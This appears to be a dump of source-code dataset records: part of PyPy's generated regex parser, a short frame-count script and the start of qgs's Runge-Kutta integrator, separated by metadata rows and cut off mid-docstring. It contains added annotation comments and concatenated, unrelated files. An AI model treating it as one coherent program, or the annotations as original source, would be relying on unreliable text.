_runner = self._Runner(self._inputstream, self._pos)
_i = _runner.recognize_2132196932(self._pos)
if _runner.last_matched_state == -1:
self._pos = _choice0
raise BacktrackException
_upto = _runner.last_matched_index + 1
_pos = self._pos
assert _pos >= 0
assert _upto >= 0
_result = self._inputstream[_pos: _upto]
self._pos = _upto
return _result
def _regex1166214427(self):
_choice1 = self._pos
_runner = self._Runner(self._inputstream, self._pos)
_i = _runner.recognize_1166214427(self._pos)
if _runner.last_matched_state == -1:
self._pos = _choice1
raise BacktrackException
_upto = _runner.last_matched_index + 1
_pos = self._pos
assert _pos >= 0
assert _upto >= 0
_result = self._inputstream[_pos: _upto]
self._pos = _upto
return _result
def _regex1423754537(self):
_choice2 = self._pos
_runner = self._Runner(self._inputstream, self._pos)
_i = _runner.recognize_1423754537(self._pos)
if _runner.last_matched_state == -1:
self._pos = _choice2
raise BacktrackException
_upto = _runner.last_matched_index + 1
_pos = self._pos
assert _pos >= 0
assert _upto >= 0
_result = self._inputstream[_pos: _upto]
self._pos = _upto
return _result
class _Runner(object):
def __init__(self, text, pos):
self.text = text
self.pos = pos
self.last_matched_state = -1
self.last_matched_index = -1
self.state = -1
def recognize_2132196932(runner, i):
#auto-generated code, don't edit
assert i >= 0
input = runner.text
state = 0
while 1:
if state == 0:
try:
char = input[i]
i += 1
except IndexError:
runner.state = 0
return ~i
if '}' <= char <= '\xff':
state = 1
elif '\x00' <= char <= "'":
state = 1
elif '_' <= char <= 'z':
state = 1
elif '@' <= char <= 'Z':
state = 1
elif '/' <= char <= '>':
state = 1
elif char == ',':
state = 1
else:
break
runner.last_matched_state = state
runner.last_matched_index = i - 1
runner.state = state
if i == len(input):
return i
else:
return ~i
break
runner.state = state
return ~i
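# Annotation: the recognize_* runners encode success and failure in a single
# integer -- on a match they return the index one past the matched prefix, on
# failure they return the bitwise complement ~i, from which the failure
# position can be recovered as ~result. The _regex* wrappers above instead
# test runner.last_matched_state == -1 to detect failure.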
def recognize_1166214427(runner, i):
#auto-generated code, don't edit
assert i >= 0
input = runner.text
state = 0
while 1:
if state == 0:
try:
char = input[i]
i += 1
except IndexError:
runner.state = 0
return ~i
if char == '0':
state = 1
elif '1' <= char <= '9':
state = 2
else:
break
if state == 2:
runner.last_matched_index = i - 1
runner.last_matched_state = state
try:
char = input[i]
i += 1
except IndexError:
runner.state = 2
return i
if '0' <= char <= '9':
state = 2
continue
else:
break
runner.last_matched_state = state
runner.last_matched_index = i - 1
runner.state = state
if i == len(input):
return i
else:
return ~i
break
runner.state = state
return ~i
def recognize_1423754537(runner, i):
#auto-generated code, don't edit
assert i >= 0
input = runner.text
state = 0
while 1:
if state == 0:
try:
char = input[i]
i += 1
except IndexError:
runner.state = 0
return ~i
if char == '\\':
state = 5
else:
break
if state == 1:
runner.last_matched_index = i - 1
runner.last_matched_state = state
try:
char = input[i]
i += 1
except IndexError:
runner.state = 1
return i
if '0' <= char <= '9':
state = 6
elif 'A' <= char <= 'F':
state = 6
elif 'a' <= char <= 'f':
state = 6
else:
break
if state == 2:
runner.last_matched_index = i - 1
runner.last_matched_state = state
try:
char = input[i]
i += 1
except IndexError:
runner.state = 2
return i
if '0' <= char <= '7':
state = 4
else:
break
if state == 3:
runner.last_matched_index = i - 1
runner.last_matched_state = state
try:
char = input[i]
i += 1
except IndexError:
runner.state = 3
return i
if '0' <= char <= '7':
state = 2
continue
else:
break
if state == 5:
try:
char = input[i]
i += 1
except IndexError:
runner.state = 5
return ~i
if char == 'x':
state = 1
continue
elif '4' <= char <= '7':
state = 2
continue
elif '0' <= char <= '3':
state = 3
continue
elif 'y' <= char <= '\xff':
state = 4
elif '\x00' <= char <= '/':
state = 4
elif 'E' <= char <= 'R':
state = 4
elif 'e' <= char <= 'r':
state = 4
elif '8' <= char <= 'C':
state = 4
elif 'X' <= char <= 'b':
state = 4
elif 'T' <= char <= 'V':
state = 4
elif 't' <= char <= 'v':
state = 4
elif char == 'c':
state = 7
else:
break
if state == 6:
try:
char = input[i]
i += 1
except IndexError:
runner.state = 6
return ~i
if '0' <= char <= '9':
state = 4
elif 'A' <= char <= 'F':
state = 4
elif 'a' <= char <= 'f':
state = 4
else:
break
if state == 7:
runner.last_matched_index = i - 1
runner.last_matched_state = state
try:
char = input[i]
i += 1
except IndexError:
runner.state = 7
return i
if '\x00' <= char <= '\xff':
state = 4
else:
break
runner.last_matched_state = state
runner.last_matched_index = i - 1
runner.state = state
if i == len(input):
return i
else:
return ~i
break
runner.state = state
return ~i
class RegexParser(PackratParser):
def __init__(self, stream):
self.init_parser(stream)
forbidden = dict.fromkeys(("__weakref__ __doc__ "
"__dict__ __module__").split())
initthere = "__init__" in RegexParser.__dict__
for key, value in Parser.__dict__.iteritems():
if key not in RegexParser.__dict__ and key not in forbidden:
setattr(RegexParser, key, value)
RegexParser.init_parser = Parser.__init__.im_func
# generated code between this line and its other occurence
def test_generate():
f = py.magic.autopath()
oldcontent = f.read()
s = "# GENERATED CODE BETWEEN THIS LINE AND ITS OTHER OCCURENCE\n".lower()
pre, gen, after = oldcontent.split(s)
from pypackrat import PyPackratSyntaxParser
from makepackrat import TreeOptimizer, ParserBuilder
p = PyPackratSyntaxParser(syntax)
t = p.file()
t = t.visit(TreeOptimizer())
visitor = ParserBuilder()
t.visit(visitor)
code = visitor.get_code()
content = """\
%s\
%s
from pypy.rlib.parsing.pypackrat import PackratParser, Status
from pypy.rlib.parsing.pypackrat import BacktrackException
from pypy.rlib.parsing import regex
import operator
%s
class RegexParser(PackratParser):
def __init__(self, stream):
self.init_parser(stream)
forbidden = dict.fromkeys(("__weakref__ __doc__ "
"__dict__ __module__").split())
initthere = "__init__" in RegexParser.__dict__
for key, value in Parser.__dict__.iteritems():
if key not in RegexParser.__dict__ and key not in forbidden:
setattr(RegexParser, key, value)
RegexParser.init_parser = Parser.__init__.im_func
%s
%s\
""" % (pre, s, code, s, after)
print content
f.write(content)
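# Usage sketch (annotation, not in the original file; assumes the parse()
# entry point generated earlier in this class -- its memo dict _dict_parse is
# initialized in __init__ -- and Python 2 syntax as above):
#
#     p = RegexParser("a|b*")
#     r = p.parse()          # a regex object built via pypy.rlib.parsing.regex
#
# On malformed input the parser raises BacktrackException carrying the
# furthest error position seen.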
| 37.993017 | 223 | 0.485717 | 6,729 | 76,176 | 5.074454 | 0.042057 | 0.049816 | 0.039214 | 0.055409 | 0.863146 | 0.856352 | 0.841709 | 0.822 | 0.815 | 0.802202 | 0 | 0.014072 | 0.430936 | 76,176 | 2,004 | 224 | 38.011976 | 0.773628 | 0.008349 | 0 | 0.776365 | 0 | 0.005299 | 0.055201 | 0.010419 | 0 | 0 | 0.000053 | 0 | 0.006889 | 0 | null | null | 0 | 0.009009 | null | null | 0.00053 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
162277c9245c28e0a476f2ea41f453d2b3f62eef | 2,005 | py | Python | python/videoFrameAnalyse.py | bodhisatan/video_codec_evaluation | ad0560de0dd02732d1a0b7a24da988dfca9f5757 | ["Apache-2.0"] | 1 | 2021-06-18T01:57:56.000Z | 2021-06-18T01:57:56.000Z | python/videoFrameAnalyse.py | bodhisatan/video_codec_evaluation | ad0560de0dd02732d1a0b7a24da988dfca9f5757 | ["Apache-2.0"] | null | null | null | python/videoFrameAnalyse.py | bodhisatan/video_codec_evaluation | ad0560de0dd02732d1a0b7a24da988dfca9f5757 | ["Apache-2.0"] | 1 | 2020-09-01T02:55:27.000Z | 2020-09-01T02:55:27.000Z |
s=[1, 1, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0]
j = 0
for i in range(len(s)):
    if s[i] > 1:
        j = j + 1
        print("%d, %d" % (i, s[i]))
print("count: %d" % j)
| 182.272727 | 1,895 | 0.338653 | 657 | 2,005 | 1.033486 | 0.021309 | 1.083947 | 1.608247 | 2.126657 | 0.920471 | 0.920471 | 0.920471 | 0.920471 | 0.920471 | 0.920471 | 0 | 0.471025 | 0.328678 | 2,005 | 10 | 1,896 | 200.5 | 0.033432 | 0 | 0 | 0 | 0 | 0 | 0.007481 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.285714 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 14 |
166b938a39e3a0a9c0229f347e1c2c2558a28529 | 54,156 | py | Python | integrators/integrator.py | sadielbartholomew/qgs | 1efe460a91fd0d8a3318d6c9156a56621b004151 | ["MIT"] | null | null | null | integrators/integrator.py | sadielbartholomew/qgs | 1efe460a91fd0d8a3318d6c9156a56621b004151 | ["MIT"] | null | null | null | integrators/integrator.py | sadielbartholomew/qgs | 1efe460a91fd0d8a3318d6c9156a56621b004151 | ["MIT"] | null | null | null |
"""
Integrator module
=================
Module with the classes of integrators to multi-thread the integration of
ordinary differential equations
.. math:: \dot{\\boldsymbol{x}} = \\boldsymbol{f}(t, \\boldsymbol{x})
of the model and its linearized version.
Module classes
--------------
* :class:`RungeKuttaIntegrator`
* :class:`RungeKuttaTglsIntegrator`
"""
import multiprocessing
import numpy as np
from numba import njit
from integrators.integrate import _integrate_runge_kutta_jit, _integrate_runge_kutta_tgls_jit, _zeros_func
from functions.util import reverse
class RungeKuttaIntegrator(object):
"""Class to integrate the ordinary differential equations (ODEs)
.. math:: \dot{\\boldsymbol{x}} = \\boldsymbol{f}(t, \\boldsymbol{x})
with a set of :class:`TrajectoryProcess` workers and a specified `Runge-Kutta method`_.
.. _Runge-Kutta method: https://en.wikipedia.org/wiki/Runge%E2%80%93Kutta_methods
Parameters
----------
num_threads: None or int, optional
Number of :class:`TrajectoryProcess` workers (threads) to use. If `None`, use the number of the
machine's available cores. Default to `None`.
b: None or ~numpy.ndarray, optional
Vector of coefficients :math:`b_i` of the `Runge-Kutta method`_ .
If `None`, use the classic RK4 method coefficients. Default to `None`.
c: None or ~numpy.ndarray, optional
Vector of coefficients :math:`c_i` of the `Runge-Kutta method`_ .
If `None`, use the classic RK4 method coefficients. Default to `None`.
a: None or ~numpy.ndarray, optional
Matrix of coefficients :math:`a_{i,j}` of the `Runge-Kutta method`_ .
If `None`, use the classic RK4 method coefficients. Default to `None`.
number_of_dimensions: None or int, optional
Allows hardcoding the dynamical system dimension. If `None`, the dimension is evaluated from the
callable :attr:`func`. Default to `None`.
Attributes
----------
num_threads: int
Number of :class:`TrajectoryProcess` workers (threads) to use.
b: ~numpy.ndarray
Vector of coefficients :math:`b_i` of the `Runge-Kutta method`_ .
c: ~numpy.ndarray
Vector of coefficients :math:`c_i` of the `Runge-Kutta method`_ .
a: ~numpy.ndarray
Matrix of coefficients :math:`a_{i,j}` of the `Runge-Kutta method`_ .
n_dim: int
Dynamical system dimension.
n_traj: int
The number of trajectories (initial conditions) computed at the last integration
performed by the integrator.
n_records: int
The number of saved states of the last integration performed by the integrator.
ic: ~numpy.ndarray
Store the integrator initial conditions.
time: ~numpy.ndarray
The time at which the state of the system was saved. Array of shape (`n_records`,).
recorded_traj: ~numpy.ndarray
Saved states of the ODEs. 3D array of shape (`n_traj`, `n_dim`, `n_records`).
func: callable
Last function :math:`\\boldsymbol{f}` used by the integrator to integrate.
"""
def __init__(self, num_threads=None, b=None, c=None, a=None, number_of_dimensions=None):
if num_threads is None:
self.num_threads = multiprocessing.cpu_count()
else:
self.num_threads = num_threads
# Default is RK4
if a is None and b is None and c is None:
self.c = np.array([0., 0.5, 0.5, 1.])
self.b = np.array([1./6, 1./3, 1./3, 1./6])
self.a = np.zeros((len(self.c), len(self.b)))
self.a[1, 0] = 0.5
self.a[2, 1] = 0.5
self.a[3, 2] = 1.
else:
self.a = a
self.b = b
self.c = c
self.ic = None
self.time = None
self.recorded_traj = None
self.n_traj = 0
self.n_dim = number_of_dimensions
self.n_records = 0
self._write_steps = 0
self._time_direction = 1
self.func = None
self._ics_queue = None
self._traj_queue = None
self._processes_list = list()
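# Annotation: the default coefficients above correspond to the classic RK4
# Butcher tableau, with c the vector of nodes, b the vector of weights and a
# the matrix of stage coefficients:
#
#     0   |
#     1/2 | 1/2
#     1/2 | 0    1/2
#     1   | 0    0    1
#     ----+--------------------
#         | 1/6  1/3  1/3  1/6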
def terminate(self):
"""Stop the workers (threads) and release the resources of the integrator."""
for process in self._processes_list:
process.terminate()
process.join()
def start(self):
"""Start or restart the workers (threads) of the integrator.
Warnings
--------
If the integrator was not previously terminated, it will be terminated first in the case
of a restart.
"""
self.terminate()
self._processes_list = list()
self._ics_queue = multiprocessing.JoinableQueue()
self._traj_queue = multiprocessing.Queue()
for i in range(self.num_threads):
self._processes_list.append(TrajectoryProcess(i, self.func, self.b, self.c, self.a,
self._ics_queue, self._traj_queue))
for process in self._processes_list:
process.daemon = True
process.start()
def set_func(self, f, ic_init=True):
"""Set the `Numba`_-jitted function :math:`\\boldsymbol{f}` to integrate.
.. _Numba: https://numba.pydata.org/
Parameters
----------
f: callable
The `Numba`_-jitted function :math:`\\boldsymbol{f}`.
Should have the signature ``f(t, x)`` where ``x`` is the state value and ``t`` is the time.
ic_init: bool, optional
Re-initialize or not the initial conditions of the integrator. Default to `True`.
Warnings
--------
This function restarts the integrator!
"""
self.func = f
if ic_init:
self.ic = None
self.start()
def set_bca(self, b=None, c=None, a=None, ic_init=True):
"""Set the coefficients of the `Runge-Kutta method`_ and restart the integrator. s
.. _Runge-Kutta method: https://en.wikipedia.org/wiki/Runge%E2%80%93Kutta_methods
Parameters
----------
b: None or ~numpy.ndarray, optional
Vector of coefficients :math:`b_i` of the `Runge-Kutta method`_ .
If `None`, does not reinitialize these coefficients.
c: None or ~numpy.ndarray, optional
Vector of coefficients :math:`c_i` of the `Runge-Kutta method`_ .
If `None`, does not reinitialize these coefficients.
a: None or ~numpy.ndarray, optional
Matrix of coefficients :math:`a_{i,j}` of the `Runge-Kutta method`_ .
If `None`, does not reinitialize these coefficients.
ic_init: bool, optional
Re-initialize or not the initial conditions of the integrator. Default to `True`.
"""
if a is not None:
self.a = a
if b is not None:
self.b = b
if c is not None:
self.c = c
if ic_init:
self.ic = None
self.start()
def initialize(self, convergence_time, dt, pert_size=0.01, reconvergence_time=None, forward=True,
number_of_trajectories=1, ic=None, reconverge=False):
"""Initialize the integration on an attractor by running it for a transient time,
For an ensemble of initial conditions, can do the same transient time for each, or the
`convergence_time` for the first one, and a smaller `reconvergence_time` for the subsequent ones.
This results into initial conditions on the attractor, stored in :attr:`ic`.
Parameters
----------
convergence_time: float
Transient time needed to converge to the attractor.
dt: float
Timestep of the transient integration.
pert_size: float, optional
If the reconvergence is activated, size of the perturbation to add to the previous ic to find
the next one. Default to 0.01.
reconvergence_time: None or float, optional
Transient time for the subsequent trajectories after the first long `convergence_time`.
forward: bool, optional
Whether to integrate the ODEs forward or backward in time. In case of backward integration, the
initial condition `ic` becomes a final condition. Default to forward integration.
number_of_trajectories: int
Number of initial conditions to find. Default to 1. Inactive if `ic` is provided.
ic: None or ~numpy.ndarray(float), optional
Initial condition of the system. Can be a 1D or a 2D array:
* 1D: Provide a single initial condition.
Should be of shape (`n_dim`,) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`.
* 2D: Provide an ensemble of initial conditions.
Should be of shape (`n_traj`, `n_dim`) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`,
and where `n_traj` is the number of initial conditions.
If `None`, use `number_of_trajectories` random initial conditions. Default to `None`.
reconverge: bool
Whether to use the smaller `reconvergence_time` transient with a perturbation
after the first initial conditions have been computed. If activated, only use the :attr:`num_threads`
first initial conditions of the `ic` argument. Default to `False`.
"""
if reconverge is None:
reconverge = False
if ic is None:
if self.n_dim is not None:
i = self.n_dim
else:
i = 1
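# Annotation: probe the dimension of func by calling it on zero vectors of
# increasing size until the call stops raising.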
while True:
self.ic = np.zeros(i)
try:
x = self.func(0., self.ic)
except:
i += 1
else:
break
i = len(self.func(0., self.ic))
if number_of_trajectories > self.num_threads:
reconverge = True
tmp_ic = np.zeros((number_of_trajectories, i))
tmp_ic[:self.num_threads] = np.random.randn(self.num_threads, i)
else:
tmp_ic = np.random.randn(number_of_trajectories, i)
else:
tmp_ic = ic.copy()
if len(tmp_ic.shape) > 1:
number_of_trajectories = tmp_ic.shape[0]
if reconverge and reconvergence_time is not None:
self.integrate(0., convergence_time, dt, ic=tmp_ic[:self.num_threads], write_steps=0, forward=forward)
t, x = self.get_trajectories()
tmp_ic[:self.num_threads] = x
if number_of_trajectories - self.num_threads > self.num_threads:
next_len = self.num_threads
else:
next_len = number_of_trajectories - self.num_threads
index = self.num_threads
while True:
perturbation = pert_size * np.random.randn(next_len, x.shape[1])
self.integrate(0., reconvergence_time, dt, ic=x[:next_len]+perturbation, write_steps=0, forward=forward)
t, x = self.get_trajectories()
tmp_ic[index:index+next_len] = x
index += next_len
if number_of_trajectories - index > self.num_threads:
next_len = self.num_threads
else:
next_len = number_of_trajectories - index
if next_len <= 0:
break
self.ic = tmp_ic
else:
self.integrate(0., convergence_time, dt, ic=tmp_ic, write_steps=0, forward=forward)
t, x = self.get_trajectories()
self.ic = x
def integrate(self, t0, t, dt, ic=None, forward=True, write_steps=1):
"""Integrate the ordinary differential equations (ODEs)
.. math:: \dot{\\boldsymbol{x}} = \\boldsymbol{f}(t, \\boldsymbol{x})
with a specified `Runge-Kutta method`_ and workers. The function :math:`\\boldsymbol{f}` is the `Numba`_ jitted
function stored in :attr:`func`. The result of the integration can be obtained afterward by calling
:meth:`get_trajectories`.
.. _Runge-Kutta method: https://en.wikipedia.org/wiki/Runge%E2%80%93Kutta_methods
.. _Numba: https://numba.pydata.org/
Parameters
----------
t0: float
Initial time of the time integration. Corresponds to the initial condition's `ic` time.
Important if the ODEs are non-autonomous.
t: float
Final time of the time integration. Corresponds to the final condition.
Important if the ODEs are non-autonomous.
dt: float
Timestep of the integration.
ic: None or ~numpy.ndarray(float), optional
Initial condition of the system. Can be a 1D or a 2D array:
* 1D: Provide a single initial condition.
Should be of shape (`n_dim`,) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`.
* 2D: Provide an ensemble of initial conditions.
Should be of shape (`n_traj`, `n_dim`) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`,
and where `n_traj` is the number of initial conditions.
If `None`, use the initial conditions stored in :attr:`ic`.
If then :attr:`ic` is `None`, use a zero initial condition.
Default to `None`.
forward: bool, optional
Whether to integrate the ODEs forward or backward in time. In case of backward integration, the
initial condition `ic` becomes a final condition. Default to forward integration.
write_steps: int, optional
Save the state of the integration in memory every `write_steps` steps. The other intermediary
steps are lost. It determines the size of the returned objects. Default is 1.
Set to 0 to return only the final state.
"""
if self.func is None:
print('No function to integrate defined!')
return 0
if ic is None:
if self.ic is None:
if self.n_dim is not None:
i = self.n_dim
else:
i = 1
while True:
self.ic = np.zeros(i)
try:
x = self.func(0., self.ic)
except:
i += 1
else:
break
i = len(self.func(0., self.ic))
self.ic = np.zeros(i)
else:
self.ic = ic
if len(self.ic.shape) == 1:
self.ic = self.ic.reshape((1, -1))
self.n_traj = self.ic.shape[0]
self.n_dim = self.ic.shape[1]
self.time = np.concatenate((np.arange(t0, t, dt), np.full((1,), t)))
self._write_steps = write_steps
if forward:
self._time_direction = 1
else:
self._time_direction = -1
if write_steps == 0:
self.n_records = 1
else:
tot = self.time[::self._write_steps]
self.n_records = len(tot)
if tot[-1] != self.time[-1]:
self.n_records += 1
self.recorded_traj = np.zeros((self.n_traj, self.n_dim, self.n_records))
for i in range(self.n_traj):
self._ics_queue.put((i, self.time, self.ic[i], self._time_direction, self._write_steps))
self._ics_queue.join()
for i in range(self.n_traj):
args = self._traj_queue.get()
self.recorded_traj[args[0]] = args[1]
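# Annotation: with the (b, c, a) convention used in this class, each worker
# advances one step of size h = dt with the generic explicit Runge-Kutta
# update
#
#     k_i     = f(t + c_i h, x_n + h * sum_j a_{i,j} k_j)
#     x_{n+1} = x_n + h * sum_i b_i k_i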
def get_trajectories(self):
"""Returns the result of the previous integrator integration.
Returns
-------
time, traj: ~numpy.ndarray
The result of the integration:
* `time` is the time at which the state of the system was saved. Array of shape (:attr:`n_records`,).
* `traj` are the saved states. 3D array of shape (:attr:`n_traj`, :attr:`n_dim`, :attr:`n_records`).
If :attr:`n_traj` = 1, a 2D array of shape (:attr:`n_dim`, :attr:`n_records`) is returned instead.
"""
if self._write_steps > 0:
if self._time_direction == 1:
if self.time[::self._write_steps][-1] == self.time[-1]:
return self.time[::self._write_steps], np.squeeze(self.recorded_traj)
else:
return np.concatenate((self.time[::self._write_steps], np.full((1,), self.time[-1]))), \
np.squeeze(self.recorded_traj)
else:
rtime = reverse(self.time[::-self._write_steps])
if rtime[0] == self.time[0]:
return rtime, np.squeeze(self.recorded_traj)
else:
return np.concatenate((np.full((1,), self.time[0]), rtime)), np.squeeze(self.recorded_traj)
else:
return self.time[-1], np.squeeze(self.recorded_traj)
def get_ic(self):
"""Returns the initial conditions stored in the integrator.
Returns
-------
~numpy.ndarray
The initial conditions.
"""
return self.ic
def set_ic(self, ic):
"""Direct setter for the integrator's initial conditions
Parameters
----------
ic: ~numpy.ndarray(float)
Initial condition of the system. Can be a 1D or a 2D array:
* 1D: Provide a single initial condition.
Should be of shape (`n_dim`,) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`.
* 2D: Provide an ensemble of initial conditions.
Should be of shape (`n_traj`, `n_dim`) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`,
and where `n_traj` is the number of initial conditions.
"""
self.ic = ic
class TrajectoryProcess(multiprocessing.Process):
""":class:`RungeKuttaIntegrator`'s workers class. Allows to multi-thread time integration.
.. _Runge-Kutta method: https://en.wikipedia.org/wiki/Runge%E2%80%93Kutta_methods
.. _Numba: https://numba.pydata.org/
Parameters
----------
processID: int
Number identifying the worker.
func: callable
`Numba`_-jitted function to integrate assigned to the worker.
b: ~numpy.ndarray, optional
Vector of coefficients :math:`b_i` of the `Runge-Kutta method`_ .
c: ~numpy.ndarray, optional
Vector of coefficients :math:`c_i` of the `Runge-Kutta method`_ .
a: ~numpy.ndarray, optional
Matrix of coefficients :math:`a_{i,j}` of the `Runge-Kutta method`_ .
ics_queue: multiprocessing.JoinableQueue
Queue from which the worker fetches initial-conditions input.
traj_queue: multiprocessing.Queue
Queue to which the worker returns the integration results.
Attributes
----------
processID: int
Number identifying the worker.
func: callable
`Numba`_-jitted function to integrate assigned to the worker.
b: ~numpy.ndarray
Vector of coefficients :math:`b_i` of the `Runge-Kutta method`_ .
c: ~numpy.ndarray
Vector of coefficients :math:`c_i` of the `Runge-Kutta method`_ .
a: ~numpy.ndarray
Matrix of coefficients :math:`a_{i,j}` of the `Runge-Kutta method`_ .
ics_queue: multiprocessing.JoinableQueue
Queue from which the worker fetches initial-conditions input.
traj_queue: multiprocessing.Queue
Queue to which the worker returns the integration results.
"""
def __init__(self, processID, func, b, c, a, ics_queue, traj_queue):
super().__init__()
self.processID = processID
self.ics_queue = ics_queue
self.traj_queue = traj_queue
self.func = func
self.a = a
self.b = b
self.c = c
def run(self):
"""Main worker computing routine. Perform the time integration with the fetched initial conditons."""
while True:
args = self.ics_queue.get()
recorded_traj = _integrate_runge_kutta_jit(self.func, args[1], args[2][np.newaxis, :], args[3], args[4],
self.b, self.c, self.a)
self.traj_queue.put((args[0], recorded_traj))
self.ics_queue.task_done()
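# Annotation: the integrator and its workers form a producer/consumer
# pipeline -- initial conditions are posted on a JoinableQueue, each daemon
# worker loops on get()/task_done(), and results come back tagged with their
# trajectory index on a plain Queue, so out-of-order completion is harmless.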
class RungeKuttaTglsIntegrator(object):
"""Class to integrate simultaneously the ordinary differential equations (ODEs)
.. math:: \dot{\\boldsymbol{x}} = \\boldsymbol{f}(t, \\boldsymbol{x})
and its tangent linear model, i.e. the linearized ODEs
.. math :: \dot{\\boldsymbol{\delta x}} = \\boldsymbol{\mathrm{J}}(t, \\boldsymbol{x}) \cdot \\boldsymbol{\delta x}
where :math:`\\boldsymbol{\mathrm{J}} = \\frac{\partial \\boldsymbol{f}}{\partial \\boldsymbol{x}}` is the
Jacobian matrix of :math:`\\boldsymbol{f}`, with a specified `Runge-Kutta method`_.
To solve this equation, one has to integrate both ODEs simultaneously. This class does so with a set
of :class:`TglsTrajectoryProcess` workers.
The functions :math:`\\boldsymbol{f}` and :math:`\\boldsymbol{J}` should
be `Numba`_ jitted functions. These functions must have a signature ``f(t, x)`` and ``J(t, x)`` where ``x`` is
the state value and ``t`` is the time.
.. _Runge-Kutta method: https://en.wikipedia.org/wiki/Runge%E2%80%93Kutta_methods
.. _Numba: https://numba.pydata.org/
.. _fundamental matrix of solutions: https://en.wikipedia.org/wiki/Fundamental_matrix_(linear_differential_equation)
Parameters
----------
num_threads: None or int, optional
Number of :class:`TrajectoryProcess` workers (threads) to use. If `None`, use the number of the
machine's available cores. Default to `None`.
b: None or ~numpy.ndarray, optional
Vector of coefficients :math:`b_i` of the `Runge-Kutta method`_ .
If `None`, use the classic RK4 method coefficients. Default to `None`.
c: None or ~numpy.ndarray, optional
Vector of coefficients :math:`c_i` of the `Runge-Kutta method`_ .
If `None`, use the classic RK4 method coefficients. Default to `None`.
a: None or ~numpy.ndarray, optional
Matrix of coefficients :math:`a_{i,j}` of the `Runge-Kutta method`_ .
If `None`, use the classic RK4 method coefficients. Default to `None`.
number_of_dimensions: None or int, optional
Allows hardcoding the dynamical system dimension. If `None`, the dimension is evaluated from the
callable :attr:`func`. Default to `None`.
Attributes
----------
num_threads: int
Number of :class:`TrajectoryProcess` workers (threads) to use.
b: ~numpy.ndarray
